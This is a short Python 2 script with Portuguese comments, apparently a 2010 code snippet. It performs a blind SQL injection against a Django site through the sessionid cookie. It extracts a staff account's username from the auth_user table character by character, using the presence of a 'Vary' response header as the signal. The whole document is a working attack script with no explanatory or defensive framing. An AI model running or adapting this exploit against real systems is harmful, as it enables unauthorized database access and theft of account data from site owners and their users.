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Created November 8, 2010 02:28
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# -*- ecoding:utf-8 -*-
import urllib2
from string import ascii_lowercase, digits
def inject(sql):
"""Injeta o commando SQL no cookie da requisição."""
r = urllib2.Request("http://localhost")
r.add_header("Cookie", "sessionid=' UNION %s" % sql.replace("\n", " ").strip())
return urllib2.urlopen(r)
def verify(response):
"""Verifica a existência da variável cookie no cabecalho HTTP.
Essa variável indica que a resposta é do django."""
return "Vary" in response.headers
if __name__ == "__main__":
username = ""
max_number_of_django_auth_username = 30
for interation in xrange(max_number_of_django_auth_username):
for letter_or_digit in ascii_lowercase + digits + "@._":
response = inject("SELECT CASE STRCMP(LOWER(SUBSTRING(username,%(i)d,1)),\
'%(char)s') WHEN 0 THEN CONCAT(email,'ABigDataHereFakeUserLoggedinABigDataHereABigDat\
aHer') ELSE email END FROM auth_user WHERE is_staff ORDER BY 1,'1" % {
"char": letter_or_digit,
"i": interation})
if verify(response):
username += letter_or_digit
print "username:", username
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